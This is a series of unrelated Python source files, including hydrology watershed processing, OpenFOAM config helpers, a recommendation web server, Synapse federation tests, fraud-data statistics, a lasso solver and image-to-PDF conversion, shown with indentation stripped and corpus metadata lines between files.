dist_filename = os.path.join(subwatershed_dir, dist_file)
#shp_filename = os.path.join(output_dir, "mypoint.shp")
distance_stream = float(extract_value_from_raster_point(dist_filename, albers_x, albers_y))
create_shape_from_point((latitude, longitude), (albers_y, albers_x), "mypoint", infile_crs[0], distance_stream )
grid_name = sub_file_name + str(ID)
# add file name for attributes
ad8_file = grid_name + "ad8.tif"
ord_file = grid_name + "ord.tif"
plen_file = grid_name + "plen.tif"
tlen_file = grid_name + "tlen.tif"
grid_dir = subwatershed_dir
outlet_point = "mypoint"
new_gage_watershed_name = "local_subwatershed"
snaptostream = snapping
log.write("Identify subwatershed %s seconds \n" % (time.time() - start_time))
start_time = time.time()
if(not internaldrain):
if snaptostream == "1":
if ID > 0 and (distance_stream < float(maximum_snap_distance)):
distance_thresh=int(float(maximum_snap_distance)/30+10) # This is an integer number of grid cells to move and assumes 30 m cells. dist/30 is max number of cells and +10 adds a buffer to make sure we move to the stream regardless
else:
distance_thresh = 0
else:
distance_thresh = 0
cmd = generate_moveoutletstostream_command(
mpi_dir,
np,
taudem_dir,
grid_dir,
grid_name,
output_dir,
outlet_point,
distance_thresh)
#print(cmd)
os.system(cmd) # This was giving an input line is too long error in PC testing
#subprocess.check_call(cmd)
else:
# just recreate the New_Outlet file at the original location
create_shape_from_point((latitude, longitude), (albers_y, albers_x), "New_Outlet", infile_crs[0], distance_stream)
# To speed up internally drainin watershed delineation subset a region 11 km on either side of the point, rather than the whole fdr grid
# gdal_translate -projwin ulx uly lrx lry inraster.tif outraster.tif
# From http://www.gdal.org/gdal_translate.html
# "Note: in GDAL 2.1.0 and 2.1.1, using -projwin with coordinates not aligned with pixels will result in a sub-pixel shift. This has been corrected in later versions."
# If this subpixel shift is a concern then need to upgrade.
infile= os.path.join(grid_dir,grid_name+"p.tif")
outfile="localp.tif"
ulx= str(albers_x - 11000.0)
lrx=str(albers_x + 11000.0)
uly=str(albers_y + 11000.0)
lry=str(albers_y - 11000.0)
cmd="gdal_translate -projwin " + ulx + " " + uly + " " + lrx + " " + lry + ' "' + infile + '" ' + outfile
# subprocess.check_call(cmd)
os.system(cmd)
os.chdir(output_dir)
outlet_moved_file = os.path.join(output_dir, "New_Outlet.shp")
cmd = get_gauge_watershed_command(
mpi_dir,
np,
taudem_dir,
grid_dir,
grid_name,
output_dir,
outlet_moved_file,
new_gage_watershed_name,
internaldrain)
print(cmd)
#subprocess.check_call(cmd)
os.system(cmd)
cmd = 'gdal_polygonize.py -8 local_subwatershed.tif -b 1' \
' -f "ESRI Shapefile"' \
' local_subwatershed.shp local_subwatershed GRIDCODE'
# The lines below are needed for testing on some PC's where paths conflict.
# cmd= 'C:\Python27\python "C:\Program Files\GDAL\gdal_polygonize.py" -8 local_subwatershed.tif -b 1' \
# ' -f "ESRI Shapefile"' \
# ' local_subwatershed.shp local_subwatershed GRIDCODE'
#print(cmd)
os.system(cmd)
cmd = 'ogr2ogr local_subwatershed_dissolve.shp local_subwatershed.shp' \
' -dialect sqlite' \
' -sql "SELECT GRIDCODE, ST_Union(geometry) as geometry' \
' FROM local_subwatershed GROUP BY GRIDCODE"' \
' -nln results -overwrite'
#print(cmd)
os.system(cmd)
log.write("Extract subwatershed %s seconds \n" % (time.time() - start_time))
start_time = time.time()
new_gage_watershed_dissolve = new_gage_watershed_name + "_dissolve"
myid = []
subid = []
src_ds = gdal.Open(gage_watershed_rasterfile)
gt = src_ds.GetGeoTransform()
rb = src_ds.GetRasterBand(1)
if(internaldrain):
num_lines=0
else:
num_lines = sum(1 for line in open('upwacoor.txt'))
if num_lines > 1:
with open("upwacoor.txt", "rt") as f:
for line in f:
x = float(line.split(',')[0])
y = float(line.split(',')[1])
mx = x
my = y
# using this approach is the fastest than others such as using gdallocation info or extract raster
px = int((mx - gt[0]) / gt[1]) # x pixel
py = int((my - gt[3]) / gt[5]) # y pixel
pixel_data = rb.ReadAsArray(px, py, 1, 1) # Assumes 16 bit int aka 'short'
pixel_val = pixel_data[0, 0] # use the 'short' format code (2 bytes) not int (4 bytes)
myid.append(int(pixel_val))
subid = list(set(myid))
log.write("Identify upstream watersheds %s seconds \n" % (time.time() - start_time))
start_time = time.time()
# compli_watershed_IDs = [] # was subid's > 0 DGT 11/13/16 adds requirement that must be in upcatchids.txt
# if ID > 0 and num_lines > 1:
# compli_watershed_IDs = [i for i in subid if i > 0]
# len_comp = len(subid)
# else:
# len_comp = -1
# DGT replaced the above with the below
if(internaldrain):
len_comp=0
else:
with open(os.path.join(grid_dir, "upcatchids.txt"), 'r') as f:
lines = f.read().splitlines()
upcatchids = [int(x) for x in lines]
compli_watershed_IDs=[val for val in subid if val in upcatchids]
len_comp=len(compli_watershed_IDs)
if len_comp > 0:
print ("Up stream edge was reached")
sub_water_file = []
lc_watershed = os.path.join(output_dir, new_gage_watershed_dissolve + '.shp')
sub_water_file.append(lc_watershed)
for i in compli_watershed_IDs:
subwater_dir = os.path.join(str(pre_process_dir), 'Subwatershed_ALL', 'Subwatershed' + str(i))
com_watershed = "Simple_watershed" + str(i)
com_file=os.path.join(subwater_dir, com_watershed + '.shp')
if os.path.isfile(com_file):
sub_water_file.append(com_file)
os.chdir(output_dir)
for x in range(1, len(sub_water_file)):
cmd = 'ogr2ogr -update -append' + " "+sub_water_file[0] + " " + sub_water_file[x]
#print(cmd)
os.system(cmd)
cmd = 'ogr2ogr New_Point_Watershed.shp local_subwatershed_dissolve.shp' \
' -dialect sqlite' \
' -sql "SELECT GRIDCODE, ST_Union(geometry) as geometry' \
' FROM local_subwatershed_dissolve"'
#print(cmd)
os.system(cmd)
else:
print ("Up stream edge was Not reached")
os.chdir(output_dir)
cmd = 'ogr2ogr New_Point_Watershed.shp local_subwatershed_dissolve.shp' \
' -dialect sqlite ' \
' -sql "SELECT GRIDCODE, ST_Union(geometry) as geometry' \
' FROM local_subwatershed_dissolve GROUP BY GRIDCODE"'
#print(cmd)
os.system(cmd)
log.write("Join upstream watersheds %s seconds \n" % (time.time() - start_time))
start_time = time.time()
get_watershed_attributes(
'New_Outlet.shp',
'New_Point_Watershed.shp',
ad8_file,
plen_file,
tlen_file,
ord_file,
subwatershed_dir,
output_dir)
log.write("Calculate watershed attributes time %s seconds \n" % (time.time() - start_time))
start_time = time.time()
# cleanup the output directory
pattern = "^local"
path = output_dir
purge(path, pattern)
os.remove('upwacoor.txt')
log.write("Clean up time %s seconds \n" % (time.time() - start_time))
log.write("Overall time %s seconds \n" % (time.time() - overall_start_time))
log.close()
if __name__ == '__main__':
Point_Watershed_Function(*sys.argv[1:])
| 2.25
| 2
|
konfi/__init__.py
|
gieseladev/konfi
| 1
|
12777667
|
"""konfi is a config parser."""
from .converter import ComplexConverterABC, ConversionError, ConverterABC, \
ConverterFunc, ConverterType, convert_value, has_converter, \
register_converter, unregister_converter
from .field import Field, MISSING, NoDefaultValue, UnboundField, ValueFactory, field
from .loader import Loader, SourceError
from .source import FieldError, MultiPathError, PathError, SourceABC
from .sources import *
from .templ import create_object_from_template, fields, get_field, is_template, is_template_like, template
# load built-in converters
from . import converters
__version__ = "0.2.1"
__author__ = "<NAME>."
default_loader = Loader()
set_sources = default_loader.set_sources
load = default_loader.load
| 1.8125
| 2
|
src/setFunctions.py
|
hpsim/OBR
| 0
|
12777668
|
#!/usr/bin/env python3
from subprocess import check_output
def sed(fn, in_reg_exp, out_reg_exp, inline=True):
""" wrapper around sed """
ret = check_output(["sed", "-i", "s/" + in_reg_exp + "/" + out_reg_exp + "/g", fn])
def clean_block_from_file(fn, block_starts, block_end, replace):
""" cleans everything from block_start to block_end and replace it """
with open(fn, "r") as f:
lines = f.readlines()
with open(fn, "w") as f:
skip = False
for line in lines:
is_start = [block_start in line for block_start in block_starts]
if any(is_start):
skip = True
if skip and block_end in line:
skip = False
f.write(replace)
if not skip:
f.write(line)
def read_block_from_file(fn, block_starts, block_end):
ret = []
with open(fn, "r") as f:
lines = f.readlines()
started = False
for line in lines:
is_start = [block_start in line for block_start in block_starts]
if started:
ret.append(line)
if any(is_start):
ret.append(line)
started = True
if started and block_end in line:
return ret
return []
def find_in_block(fn, field, keyword, default):
block = read_block_from_file(fn, ['"' + field + '.*"', field + "\n"], "}")
for line in block:
for token in line.split(";"):
if keyword in token:
return token.split()[-1]
return default
def get_executor(fn, field):
return find_in_block(fn, field, "executor", "Serial")
def get_matrix_solver(fn, field):
return find_in_block(fn, field, "solver", "unknown")
def get_preconditioner(fn, field):
return find_in_block(fn, field, "preconditioner", "unknown")
def set_cells(blockMeshDict, old_cells, new_cells):
""" """
sed(blockMeshDict, old_cells, new_cells)
def set_mesh_boundary_type_to_wall(blockMeshDict):
""" """
print("DEPRECATED")
sed(blockMeshDict, "type[ ]*cyclic", "type wall")
def set_p_init_value(p):
""" """
sed(p, "type[ ]*cyclic;", "type zeroGradient;")
def set_U_init_value(U):
""" """
sed(U, "type[ ]*cyclic;", "type fixedValue;value uniform (0 0 0);")
def add_libOGL_so(controlDict):
with open(controlDict, "a") as ctrlDict_handle:
ctrlDict_handle.write('libs ("libOGL.so");')
def get_process(cmd):
try:
return check_output(cmd).decode("utf-8")
except Exception as e:
print(e)
def get_end_time(controlDict):
import re
ret = check_output(["grep", "endTime", controlDict])
ret = ret.decode("utf-8").replace(";", "").replace("\n", "")
ret = re.compile(r"[.0-9]+").findall(ret)
return ret[0]
def get_application_solver(controlDict):
ret = check_output(["grep", "application", controlDict])
return ret.decode("utf-8").split()[-1].replace(";", "")
def set_write_interval(controlDict, interval):
sed(
controlDict,
"^writeInterval[ ]*[0-9.]*;",
"writeInterval {};".format(interval),
)
def set_number_of_subdomains(decomposeParDict, subDomains):
print("setting number of subdomains", subDomains, decomposeParDict)
sed(
decomposeParDict,
"numberOfSubdomains[ ]*[0-9.]*;",
"numberOfSubdomains {};".format(subDomains),
)
def set_end_time(controlDict, endTime):
sed(controlDict, "^endTime[ ]*[0-9.]*;", "endTime {};".format(endTime))
def get_number_of_subDomains(case):
import os
_, folder, _ = next(os.walk(case))
return len([f for f in folder if "processor" in f])
def read_block(blockMeshDict):
import re
ret = check_output(["grep", "hex", blockMeshDict]).decode("utf-8")
num_cells = re.findall("[(][0-9 ]*[)]", ret)[1]
return list(map(int, re.findall("[0-9]+", num_cells)))
def read_deltaT(controlDict):
ret = (
check_output(["grep", "deltaT", controlDict])
.split()[-1]
.decode("utf-8")
.replace(";", "")
)
return float(ret)
def set_deltaT(controlDict, deltaT):
sed(controlDict, "deltaT[ ]*[0-9.]*", "deltaT {}".format(deltaT))
def set_writeInterval(controlDict, writeInterval):
sed(controlDict, "writeInterval[ ]*[0-9.]*", "writeInterval " + str(writeInterval))
def add_or_set_solver_settings(fvSolution, field, keyword, value):
# TODO check if keyword is already present
block = read_block_from_file(fvSolution, ['"' + field + '.*"{'], "}")
# clear_solver_settings(fvSolution, field)
block.insert(1, "{} {};\n".format(keyword["name"], value))
clean_block_from_file(fvSolution, [field + '.*"{'], "}\n", " ".join(block[:-1]))
def clear_solver_settings(fvSolution, field):
clean_block_from_file(
fvSolution,
[" {}\n".format(field), '"' + field + '.*"'],
" }\n",
field + "{}\n",
)
def ensure_path(path):
print("creating", path)
check_output(["mkdir", "-p", path])
| 2.703125
| 3
|
renamer/renamerView.py
|
UnzaiRyota/pairpro
| 0
|
12777669
|
<gh_stars>0
# -*- coding: utf-8 -*-
import os
from PySide2.QtWidgets import *
from PySide2.QtGui import *
from PySide2.QtCore import *
from PySide2.QtUiTools import *
absPath = os.path.dirname(__file__)
uiPath = os.path.join(absPath, "view.ui")
uiclass, baseclass = loadUiType(uiPath)
class uiClass(baseclass, uiclass):
def __init__(self, parent=None, *args, **kwargs):
super(uiClass, self).__init__(parent, *args, **kwargs)
self.setupUi(self)
class view(QMainWindow):
def __init__(self, parent=None, *args, **kwargs):
super(view, self).__init__(parent, *args, **kwargs)
self.parent = parent
self.setCentralWidget(uiClass())
| 2.046875
| 2
|
ml/webserver.py
|
Censored-Data/VK-Gaming
| 3
|
12777670
|
<gh_stars>1-10
from library import config, get_recomendation_games, get_recomendation_users, get_cs_team
from http.server import HTTPServer, BaseHTTPRequestHandler
from io import BytesIO
from urllib.parse import urlparse, parse_qs
import json
import pandas as pd
from sklearn.neighbors import NearestNeighbors
import pickle
import json
new_data = pd.read_csv('new_data.csv', index_col=0)
model = pickle.load(open('model.sav', 'rb'))
import requests
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
print(self.path)
print(urlparse(self.path).query);
print(self.headers);
query_components = parse_qs(urlparse(self.path).query)
user_id = self.headers['user_id']
path = self.headers['path']
return_data = ''
if path == 'user_recomendation':
return_data = json.dumps(json.loads(get_recomendation_users(user_id))['id'])
if path == 'game_recomendation':
return_data = json.dumps(json.loads(get_recomendation_games(user_id)))
print(return_data)
if path == 'cs_team':
return_data = get_cs_team(user_id)
response = BytesIO()
response.write(return_data.encode())
self.wfile.write(response.getvalue())
httpd = HTTPServer(('172.16.17.32', 4002), SimpleHTTPRequestHandler)
httpd.serve_forever()
| 2.609375
| 3
|
tests/federation/test_pdu_codec.py
|
uroborus/synapse
| 1
|
12777671
|
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tests import unittest
from synapse.federation.pdu_codec import (
PduCodec, encode_event_id, decode_event_id
)
from synapse.federation.units import Pdu
#from synapse.api.events.room import MessageEvent
from synapse.server import HomeServer
from mock import Mock
class PduCodecTestCase(unittest.TestCase):
def setUp(self):
self.hs = HomeServer("blargle.net")
self.event_factory = self.hs.get_event_factory()
self.codec = PduCodec(self.hs)
def test_decode_event_id(self):
self.assertEquals(
("foo", "bar.com"),
decode_event_id("<EMAIL>", "A")
)
self.assertEquals(
("foo", "bar.com"),
decode_event_id("foo", "bar.com")
)
def test_encode_event_id(self):
self.assertEquals("A@B", encode_event_id("A", "B"))
def test_codec_event_id(self):
event_id = "<EMAIL>"
self.assertEquals(
event_id,
encode_event_id(*decode_event_id(event_id, None))
)
pdu_id = ("aa", "bb.com")
self.assertEquals(
pdu_id,
decode_event_id(encode_event_id(*pdu_id), None)
)
def test_event_from_pdu(self):
pdu = Pdu(
pdu_id="foo",
context="rooooom",
pdu_type="m.room.message",
origin="bar.com",
ts=12345,
depth=5,
prev_pdus=[("alice", "bob.<EMAIL>")],
is_state=False,
content={"msgtype": u"test"},
)
event = self.codec.event_from_pdu(pdu)
self.assertEquals("<EMAIL>", event.event_id)
self.assertEquals(pdu.context, event.room_id)
self.assertEquals(pdu.is_state, event.is_state)
self.assertEquals(pdu.depth, event.depth)
self.assertEquals(["<EMAIL>"], event.prev_events)
self.assertEquals(pdu.content, event.content)
def test_pdu_from_event(self):
event = self.event_factory.create_event(
etype="m.room.message",
event_id="gargh_id",
room_id="rooom",
user_id="sender",
content={"msgtype": u"test"},
)
pdu = self.codec.pdu_from_event(event)
self.assertEquals(event.event_id, pdu.pdu_id)
self.assertEquals(self.hs.hostname, pdu.origin)
self.assertEquals(event.room_id, pdu.context)
self.assertEquals(event.content, pdu.content)
self.assertEquals(event.type, pdu.pdu_type)
event = self.event_factory.create_event(
etype="m.room.message",
event_id="<EMAIL>",
room_id="rooom",
user_id="sender",
content={"msgtype": u"test"},
)
pdu = self.codec.pdu_from_event(event)
self.assertEquals("gargh_id", pdu.pdu_id)
self.assertEquals("bob.com", pdu.origin)
self.assertEquals(event.room_id, pdu.context)
self.assertEquals(event.content, pdu.content)
self.assertEquals(event.type, pdu.pdu_type)
def test_event_from_state_pdu(self):
pdu = Pdu(
pdu_id="foo",
context="rooooom",
pdu_type="m.room.topic",
origin="bar.com",
ts=12345,
depth=5,
prev_pdus=[("alice", "bob.com")],
is_state=True,
content={"topic": u"test"},
state_key="",
)
event = self.codec.event_from_pdu(pdu)
self.assertEquals("<EMAIL>", event.event_id)
self.assertEquals(pdu.context, event.room_id)
self.assertEquals(pdu.is_state, event.is_state)
self.assertEquals(pdu.depth, event.depth)
self.assertEquals(["<EMAIL>"], event.prev_events)
self.assertEquals(pdu.content, event.content)
self.assertEquals(pdu.state_key, event.state_key)
def test_pdu_from_state_event(self):
event = self.event_factory.create_event(
etype="m.room.topic",
event_id="gargh_id",
room_id="rooom",
user_id="sender",
content={"topic": u"test"},
)
pdu = self.codec.pdu_from_event(event)
self.assertEquals(event.event_id, pdu.pdu_id)
self.assertEquals(self.hs.hostname, pdu.origin)
self.assertEquals(event.room_id, pdu.context)
self.assertEquals(event.content, pdu.content)
self.assertEquals(event.type, pdu.pdu_type)
self.assertEquals(event.state_key, pdu.state_key)
| 2
| 2
|
data/utils_data.py
|
lmzintgraf/MultiMAuS
| 14
|
12777672
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from os.path import join, dirname, exists
from os import makedirs, pardir
FOLDER_REAL_DATA = join(dirname(__file__), 'real_data')
FOLDER_SIMULATOR_INPUT = join(dirname(__file__), 'simulator_input')
FOLDER_REAL_DATA_ANALYSIS = join(FOLDER_REAL_DATA, 'analysis')
FOLDER_SIMULATOR_LOG = join(pardir, 'experiments/results')
# create the above folders if they don't exist yet
for folder in [FOLDER_REAL_DATA, FOLDER_SIMULATOR_INPUT, FOLDER_SIMULATOR_LOG, FOLDER_REAL_DATA_ANALYSIS]:
if not exists(folder):
makedirs(folder)
FILE_ANONYMIZED_DATASET = join(FOLDER_REAL_DATA, 'anonymized_dataset.csv')
FILE_REAL_LOG = join(FOLDER_REAL_DATA, 'transaction_log.csv')
FILE_SIMULATOR_LOG = join(FOLDER_SIMULATOR_LOG, 'transaction_log.csv')
def get_dataset(file):
"""
Returns the dataset (full), and subsets for non-fraud and fraud only.
:param file:
:return:
"""
# get dataset from file
dataset01 = pd.read_csv(file)
# cast "date" column datetime objects
dataset01["Global_Date"] = pd.to_datetime(dataset01["Global_Date"])
dataset01["Local_Date"] = pd.to_datetime(dataset01["Local_Date"])
# for convenience split the dataset into non-fraud(0)/fraud(1)
dataset0 = dataset01[dataset01["Target"] == 0]
dataset1 = dataset01[dataset01["Target"] == 1]
# give the datasets names
dataset01.name = 'all'
dataset0.name = 'non-fraud'
dataset1.name = 'fraud'
return dataset01, dataset0, dataset1
def get_real_dataset():
file = join(FOLDER_REAL_DATA, 'transaction_log.csv')
return get_dataset(file)
def get_simulated_dataset(result_idx):
"""
Returns the dataset (full), and subsets for non-fraud and fraud only.
:param data_source: where data comes from, type: str, value: 'real' or 'simulator'
:return:
"""
file = join(FOLDER_SIMULATOR_LOG, '{}_transaction_log.csv'.format(result_idx))
return get_dataset(file)
def get_real_data_stats():
datasets = get_real_dataset()
return get_data_stats(datasets)
def get_simulated_data_stats(result_idx):
datasets = get_simulated_dataset(result_idx)
return get_data_stats(datasets)
def get_data_stats(datasets):
data_stats_cols = ['all', 'non-fraud', 'fraud']
data_stats = pd.DataFrame(columns=data_stats_cols)
data_stats.loc['transactions'] = [d.shape[0] for d in datasets]
data_stats.loc['transactions/hour'] = [round(d['Local_Date'].apply(lambda x: x.hour).value_counts().sum()/24/366, 2) for d in datasets]
data_stats.loc['transactions/day'] = [round(d['Local_Date'].apply(lambda x: x.day).value_counts().sum() / 366, 2) for d in datasets]
data_stats.loc['transactions/week'] = [round(d['Local_Date'].apply(lambda x: x.week).value_counts().sum() / 52, 2) for d in datasets]
data_stats.loc['transactions/month'] = [round(d['Local_Date'].apply(lambda x: x.month).value_counts().sum() / 12, 2) for d in datasets]
data_stats.loc['cards'] = [len(d["CardID"].unique()) for d in datasets]
data_stats.loc['cards, single use'] = [sum(d["CardID"].value_counts() == 1) for d in datasets]
data_stats.loc['cards, multi use'] = [sum(d["CardID"].value_counts() > 1) for d in datasets]
cards_genuine = datasets[1]['CardID'].unique()
cards_fraud = datasets[2]['CardID'].unique()
data_stats.loc['fraud cards in genuine'] = ['-', '-', len(np.intersect1d(cards_genuine, cards_fraud)) / len(cards_fraud)]
data_stats.loc['first transaction'] = [min(d["Global_Date"]).date() for d in datasets]
data_stats.loc['last transaction'] = [max(d["Global_Date"]).date() for d in datasets]
data_stats.loc['min amount'] = [min(d["Amount"]) for d in datasets]
data_stats.loc['max amount'] = [max(d["Amount"]) for d in datasets]
data_stats.loc['avg amount'] = [np.average(d["Amount"]) for d in datasets]
data_stats.loc['num merchants'] = [len(d["MerchantID"].unique()) for d in datasets]
data_stats.loc['countries'] = [len(d["Country"].unique()) for d in datasets]
data_stats.loc['currencies'] = [len(d["Currency"].unique()) for d in datasets]
data_stats.loc['min trans/card'] = [min(d["CardID"].value_counts()) for d in datasets]
data_stats.loc['max trans/card'] = [max(d["CardID"].value_counts()) for d in datasets]
data_stats.loc['avg trans/card'] = [np.average(d["CardID"].value_counts()) for d in datasets]
return data_stats
def get_grouped_prob(group_by, col_name):
grouped_prob = get_dataset()[0].groupby([group_by, col_name]).size()
grouped_prob = grouped_prob.groupby(level=0).apply(lambda x: x / sum(x))
return grouped_prob
def get_transaction_dist(col_name):
""" calculate fractions of transactions for given column """
possible_vals = get_dataset()[0][col_name].value_counts().unique()
trans_count = pd.DataFrame(0, index=possible_vals, columns=['all', 'non-fraud', 'fraud'])
trans_count['all'] = get_dataset()[0][col_name].value_counts().value_counts()
trans_count['non-fraud'] = get_dataset()[1][col_name].value_counts().value_counts()
trans_count['fraud'] = get_dataset()[1][col_name].value_counts().value_counts()
trans_count = trans_count.fillna(0)
trans_count /= np.sum(trans_count.values, axis=0)
# save
trans_count.to_csv(join(FOLDER_SIMULATOR_INPUT, 'fract-dist.csv'.format(col_name)), index_label=False)
# print
print(col_name)
print(trans_count)
print("")
return trans_count
def plot_hist_num_transactions(trans_frac, col_name):
""" method to plot histogram of number of transactions for a column """
plt.figure(figsize=(10, 7))
for i in range(3):
plt.subplot(3, 1, i+1)
plt.bar(range(trans_frac.shape[0]), trans_frac.values[:, i], label=trans_frac.index[i])
plt.ylabel('num transactions')
if i == 2:
plt.xlabel(col_name)
plt.savefig(join(FOLDER_SIMULATOR_INPUT, '{}_num-trans_hist'.format(col_name)))
plt.close()
def plot_bar_trans_prob(trans_frac, col_name, file_name=None):
""" method to plot bar plot of number of transactions for a column """
plt.figure()
bottoms = np.vstack((np.zeros(3), np.cumsum(trans_frac, axis=0)))
for i in range(trans_frac.shape[0]):
plt.bar((0, 1, 2), trans_frac.values[i], label=trans_frac.index[i], bottom=bottoms[i])
plt.xticks([0, 1, 2], ['all', 'non-fraud', 'fraud'])
h = plt.ylabel('%')
h.set_rotation(0)
plt.title("{} Distribution".format(col_name))
plt.legend()
if not file_name:
file_name = col_name
plt.savefig(join(FOLDER_SIMULATOR_INPUT, '{}_num-trans_bar'.format(file_name)))
plt.close()
| 3.0625
| 3
|
django_cat_app/models.py
|
NikolasE/telegram_catbot
| 0
|
12777673
|
<filename>django_cat_app/models.py
from django.db import models
# we simply count the number of cat images we sent to a person
# (we use first name as user_id which will create collisions, but also adds privacy by design)
class UserLog(models.Model):
user_id = models.CharField(max_length=100)
cat_count = models.IntegerField(default=0)
| 2.390625
| 2
|
products/admin.py
|
BassamMismar/store
| 0
|
12777674
|
<reponame>BassamMismar/store<gh_stars>0
from django.contrib import admin
from .models import Product
| 1.039063
| 1
|
scripts/const/consts.py
|
jiamingli9674/Intelligent-Checkout-System
| 2
|
12777675
|
<gh_stars>1-10
import os
SCRIPT_ROOT_DIR = os.getcwd()
ROOT_DIR = os.path.dirname(SCRIPT_ROOT_DIR)
IMAGE_DIR = os.path.join(ROOT_DIR, 'images')
ANTI_SPOOFING_MODELS_DIR = os.path.join(ROOT_DIR, "models", "anti_spoof_models")
DATA_DIR = os.path.join(ROOT_DIR, "data")
FACE_DETECTION_CAFFE_MODEL = os.path.join(ROOT_DIR, "models", "face_detection_model", "Widerface-RetinaFace.caffemodel")
FACE_DETECTION_CAFFE_WEIGHTS = os.path.join(ROOT_DIR, "models", "face_detection_model", "deploy.prototxt")
FACE_DISTANCE_THRESHOLD = 0.5
UNKNOWN = "unknow"
SKIP_FRAMES = 5
PICKEL_FILE_NAME = "face_encodings.pkl"
FACE_ID_NO_PEOPLE_EXIST = -1
FACE_ID_MORE_THAN_ONE_PEOPLE = -2
FACE_ID_ENCODING_SUCESS = 0
| 1.796875
| 2
|
rvpy/__init__.py
|
TimothyKBook/distributions
| 1
|
12777676
|
<reponame>TimothyKBook/distributions
from .distribution import Distribution
from .normal import Normal, StandardNormal, LogNormal
from .binomial import Bernoulli, Binomial
from .cuniform import CUniform
from .gamma import Gamma, Exponential, ChiSq
from .beta import Beta
from .t import T
from .f import F
from .cauchy import Cauchy, StandardCauchy
from .poisson import Poisson
from .duniform import DUniform
from .laplace import Laplace
from .weibull import Weibull, Rayleigh
from .negbin import NegativeBinomial, Geometric
from .hypergeom import Hypergeometric
from .pareto import Pareto
from .logistic import Logistic, LogLogistic
from .gompertz import Gompertz
from .gumbel import Gumbel
from .degenerate import Degenerate
from .transformations import abs, exp, log, sqrt, pow
__all__ = [
'Normal', 'StandardNormal', "LogNormal",
'Bernoulli', 'Binomial',
'CUniform',
'Gamma', 'ChiSq', 'Exponential',
'Beta',
'T',
'F',
'Laplace',
'Cauchy', 'StandardCauchy',
'Poisson',
'DUniform',
'Weibull', 'Rayleigh',
'NegativeBinomial', 'Geometric',
'Hypergeometric',
'Pareto',
'Logistic', 'LogLogistic',
'Gompertz',
'Gumbel',
'Degenerate',
'abs', 'exp', 'log', 'sqrt', 'pow'
]
__version__ = '0.3'
| 2.078125
| 2
|
KMtorch/helpers.py
|
mscipio/KMtorch
| 1
|
12777677
|
<gh_stars>1-10
import pycuda.driver as drv
import torch
import numpy as np
__all__ = ['Holder','Utils']
class Holder(drv.PointerHolderBase):
def __init__(self, t):
super(drv.PointerHolderBase, self).__init__()
self.t = t
self.gpudata = t.data_ptr()
def get_pointer(self):
return self.t.data_ptr()
class Utils():
def checkInputs(self, var):
if isinstance(var, torch.Tensor):
if var.is_cuda:
var_out = var.type(torch.cuda.FloatTensor)
else:
var_out = var.type(torch.cuda.FloatTensor).cuda()
else:
var_out = torch.from_numpy(np.asarray(var)).type(torch.cuda.FloatTensor).cuda()
return var_out
| 2.21875
| 2
|
invprob/optim.py
|
Guillaume-Garrigos/inverse-problems
| 4
|
12777678
|
import numpy as np
from numpy import linalg as la
import invprob.sparse as sparse
def fb_lasso(A, y, reg_param, iter_nb, x_ini=None, inertia=False, verbose=False):
''' Use the Forward-Backward algorithm to find a minimizer of:
reg_param*norm(x,1) + 0.5*norm(Ax-y,2)**2
Eventually outputs the functional values and support of the iterates
while running the method
reg_param is either a number, in which case we use it all along the iterations
or a sequence of size iter_nb
'''
# Manage optional input/output
if verbose: # Optional output
regret = np.zeros(iter_nb)
sparsity = np.zeros(iter_nb)
support = []
path = np.zeros((A.shape[1], iter_nb))
if x_ini is not None: # Optional initialization
x = x_ini
else:
x = np.zeros((A.shape[1], 1))
if isinstance(reg_param, (int, float)): # Fixed or not parameter
param = reg_param * np.ones(iter_nb)
else:
param = reg_param
if inertia:
alpha = [k/(k+3) for k in np.arange(iter_nb)] # asymptotically equivalent to Nesterov
else:
alpha = np.zeros(iter_nb) # no inertia
# The core of the algorithm
stepsize = 0.5 * 2 / (la.norm(A, 2)**2)
T = A.T@A
ATy = A.T@y
gradient = lambda x: x - stepsize*(T@x - ATy)
forward_backward = lambda x, param: sparse.soft_thresholding(gradient(x), param*stepsize)
x_old = x
for k in range(iter_nb):
if verbose:
regret[k] = 0.5 * la.norm(A@x - y, 2)**2 + param[k] * la.norm(x, 1)
support.append( tuple(np.where(np.abs(x) > 1e-15)[0]) )
sparsity[k] = len(support[k])
path[:, k] = x.reshape((x.shape[0]))
x, x_old = forward_backward( (1+alpha[k])*x - alpha[k]*x_old, param[k] ), x
# Output
if verbose:
details = {
"function_value": regret,
"iterate_support": support,
"iterate_sparsity": sparsity,
"iterate_path": path
}
return x, details
else:
return x
| 3.1875
| 3
|
workers/convert/convert_image.py
|
dainst/cilantro
| 3
|
12777679
|
<filename>workers/convert/convert_image.py
import logging
import os
import subprocess
from PIL import Image as PilImage
import ocrmypdf
import pyocr
log = logging.getLogger(__name__)
tools = pyocr.get_available_tools()
if len(tools) == 0:
log.error("No OCR tool found")
ocr_tool = tools[0]
log.debug("Will use ocr-tool: " + ocr_tool.get_name())
ocr_langs = ocr_tool.get_available_languages()
log.debug("Available languages: %s" % ", ".join(ocr_langs))
def convert_tif_to_ptif(source_file, output_dir):
"""Transform the source TIFF file to PTIF via vips shell command."""
new_filename = os.path.join(output_dir,
os.path.splitext(os.path.basename(
source_file))[0] + '.ptif')
shell_command = subprocess.run([
"vips",
"im_vips2tiff",
source_file,
f"{new_filename}:jpeg,tile:256x256,pyramid"
])
if shell_command.returncode != 0:
log.error("PTIF conversion failed")
raise OSError(f"PTIF conversion failed")
def convert_tif_to_jpg(source_file, target_file):
"""
Save the parameter source file and saves it as the target file.
:param str source_file: path to the TIF source file
:param str target_file: path to the generated output file
"""
if source_file != target_file:
logging.getLogger(__name__).debug(f"Converting {source_file} "
f"to {target_file}")
image = PilImage.open(source_file)
rgb_im = image.convert('RGB')
rgb_im.save(target_file)
rgb_im.close()
image.close()
def convert_jpg_to_pdf(source_file, target_file, max_size=(900, 1200)):
"""
Make a 1 Paged PDF Document from a jpg file.
:param str source_file: path to the jpg
:param str target_file: desired output path
:param tuple max_size: the maximum size in pixels of the resulting pdf
"""
